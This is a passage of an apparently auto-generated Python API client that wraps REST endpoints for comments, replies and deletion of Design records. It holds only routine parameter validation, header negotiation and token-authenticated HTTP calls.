    auth_settings = ['access_token']

    return self.api_client.call_api(resource_path, 'GET',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='TeamMember',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    collection_formats=collection_formats)
def designs_id_comments_nk_design_get(self, id, nk, **kwargs):
    """
    Fetches belongsTo relation design.

    Synchronous by default; supply a `callback` function to perform the
    request asynchronously, in which case the request thread is returned.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_id_comments_nk_design_get(id, nk, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param str nk: Foreign key for comments. (required)
    :param bool refresh:
    :return: Design
    """
    # Unwrap the HTTP response in both modes; the delegate returns the
    # data synchronously or the request thread when a callback is set.
    kwargs['_return_http_data_only'] = True
    return self.designs_id_comments_nk_design_get_with_http_info(id, nk, **kwargs)
def designs_id_comments_nk_design_get_with_http_info(self, id, nk, **kwargs):
    """
    Fetches belongsTo relation design.

    Synchronous by default; supply a `callback` function to perform the
    request asynchronously, in which case the request thread is returned.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_id_comments_nk_design_get_with_http_info(id, nk, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param str nk: Foreign key for comments. (required)
    :param bool refresh:
    :return: Design
    """
    # Reject keyword arguments this endpoint does not understand.
    all_params = ['id', 'nk', 'refresh', 'callback', '_return_http_data_only']
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method designs_id_comments_nk_design_get" % key
            )
        params[key] = val
    del params['kwargs']

    # Both path parameters are mandatory for this call.
    for required in ('id', 'nk'):
        if params.get(required) is None:
            raise ValueError("Missing the required parameter `%s` when calling `designs_id_comments_nk_design_get`" % required)

    collection_formats = {}
    resource_path = '/Designs/{id}/comments/{nk}/design'.replace('{format}', 'json')

    path_params = {k: params[k] for k in ('id', 'nk') if k in params}
    query_params = {k: params[k] for k in ('refresh',) if k in params}
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None

    # Negotiate `Accept`; leave the header out when nothing was selected.
    accept = self.api_client.select_header_accept(
        ['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
    if accept:
        header_params['Accept'] = accept

    # Negotiate `Content-Type`.
    header_params['Content-Type'] = self.api_client.select_header_content_type(
        ['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])

    # This endpoint authenticates with the access token.
    auth_settings = ['access_token']

    return self.api_client.call_api(resource_path, 'GET',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='Design',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    collection_formats=collection_formats)
def designs_id_comments_nk_replies_count_get(self, id, nk, **kwargs):
    """
    Counts replies of DesignComment.

    Synchronous by default; supply a `callback` function to perform the
    request asynchronously, in which case the request thread is returned.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_id_comments_nk_replies_count_get(id, nk, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param str nk: Foreign key for comments. (required)
    :param str where: Criteria to match model instances
    :return: InlineResponse2001
    """
    # Unwrap the HTTP response in both modes; the delegate returns the
    # data synchronously or the request thread when a callback is set.
    kwargs['_return_http_data_only'] = True
    return self.designs_id_comments_nk_replies_count_get_with_http_info(id, nk, **kwargs)
def designs_id_comments_nk_replies_count_get_with_http_info(self, id, nk, **kwargs):
    """
    Counts replies of DesignComment.

    Synchronous by default; supply a `callback` function to perform the
    request asynchronously, in which case the request thread is returned.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_id_comments_nk_replies_count_get_with_http_info(id, nk, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param str nk: Foreign key for comments. (required)
    :param str where: Criteria to match model instances
    :return: InlineResponse2001
    """
    # Reject keyword arguments this endpoint does not understand.
    all_params = ['id', 'nk', 'where', 'callback', '_return_http_data_only']
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method designs_id_comments_nk_replies_count_get" % key
            )
        params[key] = val
    del params['kwargs']

    # Both path parameters are mandatory for this call.
    for required in ('id', 'nk'):
        if params.get(required) is None:
            raise ValueError("Missing the required parameter `%s` when calling `designs_id_comments_nk_replies_count_get`" % required)

    collection_formats = {}
    resource_path = '/Designs/{id}/comments/{nk}/replies/count'.replace('{format}', 'json')

    path_params = {k: params[k] for k in ('id', 'nk') if k in params}
    query_params = {k: params[k] for k in ('where',) if k in params}
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None

    # Negotiate `Accept`; leave the header out when nothing was selected.
    accept = self.api_client.select_header_accept(
        ['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
    if accept:
        header_params['Accept'] = accept

    # Negotiate `Content-Type`.
    header_params['Content-Type'] = self.api_client.select_header_content_type(
        ['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])

    # This endpoint authenticates with the access token.
    auth_settings = ['access_token']

    return self.api_client.call_api(resource_path, 'GET',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='InlineResponse2001',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    collection_formats=collection_formats)
def designs_id_comments_nk_replies_fk_delete(self, id, nk, fk, **kwargs):
    """
    Delete a related item by id for replies.

    Synchronous by default; supply a `callback` function to perform the
    request asynchronously, in which case the request thread is returned.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_id_comments_nk_replies_fk_delete(id, nk, fk, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param str nk: Foreign key for comments. (required)
    :param str fk: Foreign key for replies (required)
    :return: None
    """
    # Unwrap the HTTP response in both modes; the delegate returns the
    # data synchronously or the request thread when a callback is set.
    kwargs['_return_http_data_only'] = True
    return self.designs_id_comments_nk_replies_fk_delete_with_http_info(id, nk, fk, **kwargs)
def designs_id_comments_nk_replies_fk_delete_with_http_info(self, id, nk, fk, **kwargs):
    """
    Delete a related item by id for replies.
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_id_comments_nk_replies_fk_delete_with_http_info(id, nk, fk, callback=callback_function)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param str nk: Foreign key for comments. (required)
    :param str fk: Foreign key for replies (required)
    :return: None
        If the method is called asynchronously,
        returns the request thread.
    """
    all_params = ['id', 'nk', 'fk']
    all_params.append('callback')
    all_params.append('_return_http_data_only')
    # Snapshot the local namespace (self, id, nk, fk, kwargs, all_params)
    # so positional and keyword arguments can be handled uniformly below.
    # NOTE: statement order matters — locals() must be taken before any
    # other local variable is introduced.
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method designs_id_comments_nk_replies_fk_delete" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'id' is set
    if ('id' not in params) or (params['id'] is None):
        raise ValueError("Missing the required parameter `id` when calling `designs_id_comments_nk_replies_fk_delete`")
    # verify the required parameter 'nk' is set
    if ('nk' not in params) or (params['nk'] is None):
        raise ValueError("Missing the required parameter `nk` when calling `designs_id_comments_nk_replies_fk_delete`")
    # verify the required parameter 'fk' is set
    if ('fk' not in params) or (params['fk'] is None):
        raise ValueError("Missing the required parameter `fk` when calling `designs_id_comments_nk_replies_fk_delete`")
    collection_formats = {}
    resource_path = '/Designs/{id}/comments/{nk}/replies/{fk}'.replace('{format}', 'json')
    path_params = {}
    if 'id' in params:
        path_params['id'] = params['id']
    if 'nk' in params:
        path_params['nk'] = params['nk']
    if 'fk' in params:
        path_params['fk'] = params['fk']
    query_params = {}
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
    # An empty Accept is dropped so the client default applies.
    if not header_params['Accept']:
        del header_params['Accept']
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
    # Authentication setting
    auth_settings = ['access_token']
    # DELETE has no response model (response_type=None).
    return self.api_client.call_api(resource_path, 'DELETE',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type=None,
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    collection_formats=collection_formats)
def designs_id_comments_nk_replies_fk_get(self, id, nk, fk, **kwargs):
    """
    Find a related item by id for replies.

    Synchronous by default; supply a `callback` function to run the
    request asynchronously, in which case the request thread is returned
    and the callback receives the response.

    :param callback function: invoked with the response for an
        asynchronous request. (optional)
    :param str id: Design id (required)
    :param str nk: Foreign key for comments. (required)
    :param str fk: Foreign key for replies (required)
    :return: DesignComment, or the request thread when called asynchronously.
    """
    # Force the plain-data return; the *_with_http_info variant handles
    # both the callback (async) and direct (sync) cases and returns the
    # same value either way, so one delegation covers both paths.
    kwargs['_return_http_data_only'] = True
    delegate = self.designs_id_comments_nk_replies_fk_get_with_http_info
    return delegate(id, nk, fk, **kwargs)
def designs_id_comments_nk_replies_fk_get_with_http_info(self, id, nk, fk, **kwargs):
    """
    Find a related item by id for replies.
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_id_comments_nk_replies_fk_get_with_http_info(id, nk, fk, callback=callback_function)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param str nk: Foreign key for comments. (required)
    :param str fk: Foreign key for replies (required)
    :return: DesignComment
        If the method is called asynchronously,
        returns the request thread.
    """
    all_params = ['id', 'nk', 'fk']
    all_params.append('callback')
    all_params.append('_return_http_data_only')
    # Snapshot the local namespace so positional and keyword arguments can
    # be handled uniformly below.  NOTE: statement order matters — locals()
    # must be taken before any other local variable is introduced.
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method designs_id_comments_nk_replies_fk_get" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'id' is set
    if ('id' not in params) or (params['id'] is None):
        raise ValueError("Missing the required parameter `id` when calling `designs_id_comments_nk_replies_fk_get`")
    # verify the required parameter 'nk' is set
    if ('nk' not in params) or (params['nk'] is None):
        raise ValueError("Missing the required parameter `nk` when calling `designs_id_comments_nk_replies_fk_get`")
    # verify the required parameter 'fk' is set
    if ('fk' not in params) or (params['fk'] is None):
        raise ValueError("Missing the required parameter `fk` when calling `designs_id_comments_nk_replies_fk_get`")
    collection_formats = {}
    resource_path = '/Designs/{id}/comments/{nk}/replies/{fk}'.replace('{format}', 'json')
    path_params = {}
    if 'id' in params:
        path_params['id'] = params['id']
    if 'nk' in params:
        path_params['nk'] = params['nk']
    if 'fk' in params:
        path_params['fk'] = params['fk']
    query_params = {}
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
    # An empty Accept is dropped so the client default applies.
    if not header_params['Accept']:
        del header_params['Accept']
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
    # Authentication setting
    auth_settings = ['access_token']
    # Response is deserialized into a DesignComment model.
    return self.api_client.call_api(resource_path, 'GET',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='DesignComment',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    collection_formats=collection_formats)
def designs_id_comments_nk_replies_fk_put(self, id, nk, fk, **kwargs):
    """
    Update a related item by id for replies.

    Synchronous by default; supply a `callback` function to run the
    request asynchronously, in which case the request thread is returned
    and the callback receives the response.

    :param callback function: invoked with the response for an
        asynchronous request. (optional)
    :param str id: Design id (required)
    :param str nk: Foreign key for comments. (required)
    :param str fk: Foreign key for replies (required)
    :param DesignComment data:
    :return: DesignComment, or the request thread when called asynchronously.
    """
    # Force the plain-data return; the *_with_http_info variant handles
    # both the callback (async) and direct (sync) cases and returns the
    # same value either way, so one delegation covers both paths.
    kwargs['_return_http_data_only'] = True
    delegate = self.designs_id_comments_nk_replies_fk_put_with_http_info
    return delegate(id, nk, fk, **kwargs)
def designs_id_comments_nk_replies_fk_put_with_http_info(self, id, nk, fk, **kwargs):
    """
    Update a related item by id for replies.
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_id_comments_nk_replies_fk_put_with_http_info(id, nk, fk, callback=callback_function)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param str nk: Foreign key for comments. (required)
    :param str fk: Foreign key for replies (required)
    :param DesignComment data:
    :return: DesignComment
        If the method is called asynchronously,
        returns the request thread.
    """
    all_params = ['id', 'nk', 'fk', 'data']
    all_params.append('callback')
    all_params.append('_return_http_data_only')
    # Snapshot the local namespace so positional and keyword arguments can
    # be handled uniformly below.  NOTE: statement order matters — locals()
    # must be taken before any other local variable is introduced.
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method designs_id_comments_nk_replies_fk_put" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'id' is set
    if ('id' not in params) or (params['id'] is None):
        raise ValueError("Missing the required parameter `id` when calling `designs_id_comments_nk_replies_fk_put`")
    # verify the required parameter 'nk' is set
    if ('nk' not in params) or (params['nk'] is None):
        raise ValueError("Missing the required parameter `nk` when calling `designs_id_comments_nk_replies_fk_put`")
    # verify the required parameter 'fk' is set
    if ('fk' not in params) or (params['fk'] is None):
        raise ValueError("Missing the required parameter `fk` when calling `designs_id_comments_nk_replies_fk_put`")
    collection_formats = {}
    resource_path = '/Designs/{id}/comments/{nk}/replies/{fk}'.replace('{format}', 'json')
    path_params = {}
    if 'id' in params:
        path_params['id'] = params['id']
    if 'nk' in params:
        path_params['nk'] = params['nk']
    if 'fk' in params:
        path_params['fk'] = params['fk']
    query_params = {}
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # Optional request body: the DesignComment payload to write.
    if 'data' in params:
        body_params = params['data']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
    # An empty Accept is dropped so the client default applies.
    if not header_params['Accept']:
        del header_params['Accept']
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
    # Authentication setting
    auth_settings = ['access_token']
    # Response is deserialized into a DesignComment model.
    return self.api_client.call_api(resource_path, 'PUT',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='DesignComment',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    collection_formats=collection_formats)
def designs_id_comments_nk_replies_get(self, id, nk, **kwargs):
    """
    Queries replies of DesignComment.

    Synchronous by default; supply a `callback` function to run the
    request asynchronously, in which case the request thread is returned
    and the callback receives the response.

    :param callback function: invoked with the response for an
        asynchronous request. (optional)
    :param str id: Design id (required)
    :param str nk: Foreign key for comments. (required)
    :param str filter:
    :return: list[DesignComment], or the request thread when called
        asynchronously.
    """
    # Force the plain-data return; the *_with_http_info variant handles
    # both the callback (async) and direct (sync) cases and returns the
    # same value either way, so one delegation covers both paths.
    kwargs['_return_http_data_only'] = True
    delegate = self.designs_id_comments_nk_replies_get_with_http_info
    return delegate(id, nk, **kwargs)
def designs_id_comments_nk_replies_get_with_http_info(self, id, nk, **kwargs):
    """
    Queries replies of DesignComment.
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_id_comments_nk_replies_get_with_http_info(id, nk, callback=callback_function)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param str nk: Foreign key for comments. (required)
    :param str filter:
    :return: list[DesignComment]
        If the method is called asynchronously,
        returns the request thread.
    """
    all_params = ['id', 'nk', 'filter']
    all_params.append('callback')
    all_params.append('_return_http_data_only')
    # Snapshot the local namespace so positional and keyword arguments can
    # be handled uniformly below.  NOTE: statement order matters — locals()
    # must be taken before any other local variable is introduced.
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method designs_id_comments_nk_replies_get" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'id' is set
    if ('id' not in params) or (params['id'] is None):
        raise ValueError("Missing the required parameter `id` when calling `designs_id_comments_nk_replies_get`")
    # verify the required parameter 'nk' is set
    if ('nk' not in params) or (params['nk'] is None):
        raise ValueError("Missing the required parameter `nk` when calling `designs_id_comments_nk_replies_get`")
    collection_formats = {}
    resource_path = '/Designs/{id}/comments/{nk}/replies'.replace('{format}', 'json')
    path_params = {}
    if 'id' in params:
        path_params['id'] = params['id']
    if 'nk' in params:
        path_params['nk'] = params['nk']
    query_params = {}
    # Optional LoopBack-style filter passed through as a query parameter.
    if 'filter' in params:
        query_params['filter'] = params['filter']
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
    # An empty Accept is dropped so the client default applies.
    if not header_params['Accept']:
        del header_params['Accept']
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
    # Authentication setting
    auth_settings = ['access_token']
    # Response is deserialized into a list of DesignComment models.
    return self.api_client.call_api(resource_path, 'GET',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='list[DesignComment]',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    collection_formats=collection_formats)
def designs_id_comments_nk_replies_post(self, id, nk, **kwargs):
    """
    Creates a new instance in replies of this model.

    Synchronous by default; supply a `callback` function to run the
    request asynchronously, in which case the request thread is returned
    and the callback receives the response.

    :param callback function: invoked with the response for an
        asynchronous request. (optional)
    :param str id: Design id (required)
    :param str nk: Foreign key for comments. (required)
    :param DesignComment data:
    :return: DesignComment, or the request thread when called asynchronously.
    """
    # Force the plain-data return; the *_with_http_info variant handles
    # both the callback (async) and direct (sync) cases and returns the
    # same value either way, so one delegation covers both paths.
    kwargs['_return_http_data_only'] = True
    delegate = self.designs_id_comments_nk_replies_post_with_http_info
    return delegate(id, nk, **kwargs)
def designs_id_comments_nk_replies_post_with_http_info(self, id, nk, **kwargs):
    """
    Creates a new instance in replies of this model.
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_id_comments_nk_replies_post_with_http_info(id, nk, callback=callback_function)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param str nk: Foreign key for comments. (required)
    :param DesignComment data:
    :return: DesignComment
        If the method is called asynchronously,
        returns the request thread.
    """
    all_params = ['id', 'nk', 'data']
    all_params.append('callback')
    all_params.append('_return_http_data_only')
    # Snapshot the local namespace so positional and keyword arguments can
    # be handled uniformly below.  NOTE: statement order matters — locals()
    # must be taken before any other local variable is introduced.
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method designs_id_comments_nk_replies_post" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'id' is set
    if ('id' not in params) or (params['id'] is None):
        raise ValueError("Missing the required parameter `id` when calling `designs_id_comments_nk_replies_post`")
    # verify the required parameter 'nk' is set
    if ('nk' not in params) or (params['nk'] is None):
        raise ValueError("Missing the required parameter `nk` when calling `designs_id_comments_nk_replies_post`")
    collection_formats = {}
    resource_path = '/Designs/{id}/comments/{nk}/replies'.replace('{format}', 'json')
    path_params = {}
    if 'id' in params:
        path_params['id'] = params['id']
    if 'nk' in params:
        path_params['nk'] = params['nk']
    query_params = {}
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # Optional request body: the DesignComment payload to create.
    if 'data' in params:
        body_params = params['data']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
    # An empty Accept is dropped so the client default applies.
    if not header_params['Accept']:
        del header_params['Accept']
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
    # Authentication setting
    auth_settings = ['access_token']
    # Response is deserialized into a DesignComment model.
    return self.api_client.call_api(resource_path, 'POST',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='DesignComment',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    collection_formats=collection_formats)
def designs_id_comments_nk_reply_of_get(self, id, nk, **kwargs):
    """
    Fetches belongsTo relation replyOf.

    Synchronous by default; supply a `callback` function to run the
    request asynchronously, in which case the request thread is returned
    and the callback receives the response.

    :param callback function: invoked with the response for an
        asynchronous request. (optional)
    :param str id: Design id (required)
    :param str nk: Foreign key for comments. (required)
    :param bool refresh:
    :return: DesignComment, or the request thread when called asynchronously.
    """
    # Force the plain-data return; the *_with_http_info variant handles
    # both the callback (async) and direct (sync) cases and returns the
    # same value either way, so one delegation covers both paths.
    kwargs['_return_http_data_only'] = True
    delegate = self.designs_id_comments_nk_reply_of_get_with_http_info
    return delegate(id, nk, **kwargs)
def designs_id_comments_nk_reply_of_get_with_http_info(self, id, nk, **kwargs):
    """
    Fetches belongsTo relation replyOf.
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_id_comments_nk_reply_of_get_with_http_info(id, nk, callback=callback_function)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param str nk: Foreign key for comments. (required)
    :param bool refresh:
    :return: DesignComment
        If the method is called asynchronously,
        returns the request thread.
    """
    all_params = ['id', 'nk', 'refresh']
    all_params.append('callback')
    all_params.append('_return_http_data_only')
    # Snapshot the local namespace so positional and keyword arguments can
    # be handled uniformly below.  NOTE: statement order matters — locals()
    # must be taken before any other local variable is introduced.
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method designs_id_comments_nk_reply_of_get" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'id' is set
    if ('id' not in params) or (params['id'] is None):
        raise ValueError("Missing the required parameter `id` when calling `designs_id_comments_nk_reply_of_get`")
    # verify the required parameter 'nk' is set
    if ('nk' not in params) or (params['nk'] is None):
        raise ValueError("Missing the required parameter `nk` when calling `designs_id_comments_nk_reply_of_get`")
    collection_formats = {}
    resource_path = '/Designs/{id}/comments/{nk}/replyOf'.replace('{format}', 'json')
    path_params = {}
    if 'id' in params:
        path_params['id'] = params['id']
    if 'nk' in params:
        path_params['nk'] = params['nk']
    query_params = {}
    # Optional refresh flag passed through as a query parameter.
    if 'refresh' in params:
        query_params['refresh'] = params['refresh']
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
    # An empty Accept is dropped so the client default applies.
    if not header_params['Accept']:
        del header_params['Accept']
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
    # Authentication setting
    auth_settings = ['access_token']
    # Response is deserialized into a DesignComment model.
    return self.api_client.call_api(resource_path, 'GET',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='DesignComment',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    collection_formats=collection_formats)
def designs_id_comments_post(self, id, **kwargs):
    """
    Creates a new instance in comments of this model.

    Synchronous by default; supply a `callback` function to run the
    request asynchronously, in which case the request thread is returned
    and the callback receives the response.

    :param callback function: invoked with the response for an
        asynchronous request. (optional)
    :param str id: Design id (required)
    :param DesignComment data:
    :return: DesignComment, or the request thread when called asynchronously.
    """
    # Force the plain-data return; the *_with_http_info variant handles
    # both the callback (async) and direct (sync) cases and returns the
    # same value either way, so one delegation covers both paths.
    kwargs['_return_http_data_only'] = True
    delegate = self.designs_id_comments_post_with_http_info
    return delegate(id, **kwargs)
def designs_id_comments_post_with_http_info(self, id, **kwargs):
    """
    Creates a new instance in comments of this model.
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_id_comments_post_with_http_info(id, callback=callback_function)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param DesignComment data:
    :return: DesignComment
        If the method is called asynchronously,
        returns the request thread.
    """
    all_params = ['id', 'data']
    all_params.append('callback')
    all_params.append('_return_http_data_only')
    # Snapshot the local namespace so positional and keyword arguments can
    # be handled uniformly below.  NOTE: statement order matters — locals()
    # must be taken before any other local variable is introduced.
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method designs_id_comments_post" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'id' is set
    if ('id' not in params) or (params['id'] is None):
        raise ValueError("Missing the required parameter `id` when calling `designs_id_comments_post`")
    collection_formats = {}
    resource_path = '/Designs/{id}/comments'.replace('{format}', 'json')
    path_params = {}
    if 'id' in params:
        path_params['id'] = params['id']
    query_params = {}
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # Optional request body: the DesignComment payload to create.
    if 'data' in params:
        body_params = params['data']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
    # An empty Accept is dropped so the client default applies.
    if not header_params['Accept']:
        del header_params['Accept']
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
    # Authentication setting
    auth_settings = ['access_token']
    # Response is deserialized into a DesignComment model.
    return self.api_client.call_api(resource_path, 'POST',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='DesignComment',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    collection_formats=collection_formats)
def designs_id_delete(self, id, **kwargs):
    """
    Delete a model instance by {{id}} from the data source.

    Synchronous by default; supply a `callback` function to run the
    request asynchronously, in which case the request thread is returned
    and the callback receives the response.

    :param callback function: invoked with the response for an
        asynchronous request. (optional)
    :param str id: Model id (required)
    :return: object, or the request thread when called asynchronously.
    """
    # Force the plain-data return; the *_with_http_info variant handles
    # both the callback (async) and direct (sync) cases and returns the
    # same value either way, so one delegation covers both paths.
    kwargs['_return_http_data_only'] = True
    delegate = self.designs_id_delete_with_http_info
    return delegate(id, **kwargs)
def designs_id_delete_with_http_info(self, id, **kwargs):
    """
    Delete a model instance by {{id}} from the data source.
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
